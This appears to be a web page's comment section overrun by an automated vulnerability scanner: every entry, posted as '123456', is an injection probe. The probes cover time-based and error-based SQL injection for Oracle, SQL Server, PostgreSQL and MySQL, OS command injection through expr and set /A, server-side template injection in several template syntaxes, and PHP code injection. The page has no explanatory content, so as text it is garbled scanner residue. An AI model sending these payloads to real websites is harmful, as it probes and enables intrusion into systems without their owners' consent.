123456 says:

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l

123456 says:

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('l',2)

123456 says:

123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',0)

123456 says:

123456'and(select+1)>0waitfor/**/delay'0:0:2

123456 says:

123456'and(select+1)>0waitfor/**/delay'0:0:0

123456 says:

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

123456 says:

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

123456 says:

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456 says:

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456 says:

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

123456 says:

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

123456 says:

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456 says:

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456 says:

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456 says:

(select*from(select+sleep(2)union/**/select+1)a)

123456 says:

(select*from(select+sleep(0)union/**/select+1)a)

123456 says:

123456"and"f"="x

123456 says:

123456"and"h"="h

123456 says:

123456'and'g'='n

123456 says:

123456'and'u'='u

123456 says:

123456/**/and+2=6

123456 says:

123456/**/and+2=2

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l says:

123456

123456'"\( says:

123456

123456鎈'"\( says:

123456

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1177838815')))>'0 says:

123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1221996036'))) says:

123456

123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('h',0) says:

123456

123456/**/and/**/cast(md5('1301166854')as/**/int)>0 says:

123456

123456'and(select'1'from/**/cast(md5(1785152228)as/**/int))>'0 says:

123456

123456'and(select+1)>0waitfor/**/delay'0:0:2 says:

123456

123456'and(select+1)>0waitfor/**/delay'0:0:0 says:

123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ says:

123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ says:

123456

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 says:

123456

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 says:

123456

extractvalue(1,concat(char(126),md5(1503301883))) says:

123456

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ says:

123456

123456"and/**/extractvalue(1,concat(char(126),md5(1104430483)))and" says:

123456

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ says:

123456

123456'and/**/extractvalue(1,concat(char(126),md5(1968435999)))and' says:

123456

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" says:

123456

expr 864954307 + 962335995 says:

123456

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" says:

123456

123456&set /A 969476088+895902812 says:

123456

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' says:

123456

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' says:

123456

123456$(expr 993259576 + 939970525) says:

123456

<%- 877716954+976534672 %> says:

123456

(select*from(select+sleep(2)union/**/select+1)a) says:

123456

123456|expr 932216371 + 882886012 says:

123456

(select*from(select+sleep(0)union/**/select+1)a) says:

123456

#set($c=918515387+985836488)${c}$c says:

123456

123456 expr 941438573 + 976134596 says:

123456

123456 says:

123456

${(878042338+950839187)?c} says:

123456

123456 says:

123456

${899916505+892637297} says:

123456

123456 says:

123456'"\(

123456 says:

expr 916812633 + 867351585

123456 says:

123456

/*1*/{{935306820+873052934}} says:

123456

123456 says:

123456鎈'"\(

123456 says:

123456&set /A 933902752+813428495

123456"and"b"="k says:

123456

123456 says:

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1798380027')))>'0

${936874936+840427318} says:

123456

123456"and"q"="q says:

123456

123456 says:

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1963102145')))

123456'and'r'='x says:

123456

123456 says:

<%- 980417645+882115084 %>

123456 says:

123456/**/and/**/cast(md5('1589135485')as/**/int)>0

123456'and'g'='g says:

123456

123456 says:

#set($c=868200935+952647955)${c}$c

123456 says:

123456'and(select'1'from/**/cast(md5(1441563616)as/**/int))>'0

123456/**/and+2=7 says:

123456

123456 says:

'-var_dump(md5(107093185))-'

123456 says:

${(925213523+903996313)?c}

123456 says:

extractvalue(1,concat(char(126),md5(1107754202)))

123456/**/and+4=4 says:

123456

123456 says:

${@var_dump(md5(716327432))};

123456 says:

123456$(expr 881694714 + 886333648)

123456 says:

${945551640+972542113}

123456 says:

123456"and/**/extractvalue(1,concat(char(126),md5(1688893256)))and"

'-var_dump(md5(644153769))-' says:

123456

123456 says:

123456|expr 892855233 + 858360503

123456 says:

/*1*/{{826162363+933724832}}

123456 says:

123456

123456 says:

${971090505+818428819}

${@var_dump(md5(193969136))}; says:

123456

123456 says:

123456'and/**/extractvalue(1,concat(char(126),md5(1363454458)))and'

123456 says:

123456 expr 813787651 + 865342704

123456 says:

kdgnymakjpqqmhxjrknq

123456 says:

123456

123456 says:

123456

123456 says:

123456

123456 says:

123456

kdgnymakjpqqmhxjrknq says:

123456

123456 says:

123456

123456 says:

123456

123456 says:

123456

123456 says:

123456

123456 says:

123456